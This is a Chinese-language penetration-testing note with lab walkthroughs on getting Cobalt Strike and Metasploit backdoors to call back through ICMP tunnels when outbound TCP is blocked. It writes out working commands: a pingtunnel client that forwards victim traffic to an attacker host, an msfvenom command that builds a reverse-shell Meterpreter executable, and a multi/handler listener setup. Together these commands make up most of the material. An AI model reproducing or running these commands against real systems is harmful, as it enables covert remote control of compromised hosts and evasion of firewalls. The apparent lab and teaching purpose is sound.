知识点
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)使用点——两个主机之间可以正常通信,但是因为防火墙配置或是某些原因无法通信
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)使用点——两个主机之间无法正常通信,通过一个中间的服务器或是设备进行通信
连接方向:正向&反向
实验
CS-ICMP-上线 端口与协议限制
解决问题:解决渗透过程中,因为防火墙或是其他原因无法链接到目标主机的情况。控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。
思路:ICMP隧道技术,在目标服务器中开启脚本负责将后门的TCP流量转入到ICMP协议中,kali中开启脚本负责监听和接受信息。
CS:
后门生成,生成后门的地址依旧为本地地址,端口为3333
两个http地址都可以填写127.0.0.1
简单理解:因为TCP流量限制无法出网,那么执行后门时让其在本地执行,流量自然不会被限制,再利用脚本转发到icmp协议
ame: 为监听器名字,可任意
HTTP Hosts: 进行回连的主机(shell反弹的主机),也就是我们kali的ip(如果是阿里云,则填阿里云主机的公网ip),可以设置多个
HTTP Hosts(Stager): Stager的马请求下载payload的地址(一般也是和上面的ip填一样)
HTTP Port(C2): payload回连的端口
在kali上运行pingtunnel脚本,用来开启隧道
在目标主机上运行一下代码,让流量从TCP转到ICMP,并从本地的3333端口转到36.128的7777端口
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.36.128 -t 192.168.36.128:7777 -tcp 1 -noprint 1 -nolog 1
在cs上布置监听器。分别监听3333和7777端口
运行脚本,cs成功上线,并且发现上线的监听器名称为mz,而mz就是监听的7777端口,及实验成功。
CS-ICMP-上线 端口与协议限制
思路:与cs一致,不在细讲
生成后门:生成时必须本地,因为目标如果禁止tcp链接的木马,无论是出站还是入站脚本都无法链接
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > mz.exe
MSF启动监听:因为利用隧道将脚本的端口改为4444,所以需要监听4444端口,监听ip直接设置为任何ip或是特定ip都可
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Kali开启隧道:
./pingtunnel -type server
被攻击服务器:Win开启隧道 //将本地3333 icmp协议数据转发至128ip的4444流量上(管理员运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.46.66 -t 192.168.36.128:4444 -tcp 1 -noprint 1 -nolog 1
被攻击服务器:在执行木马即可
发现4444端口成功监听到信息,实验成功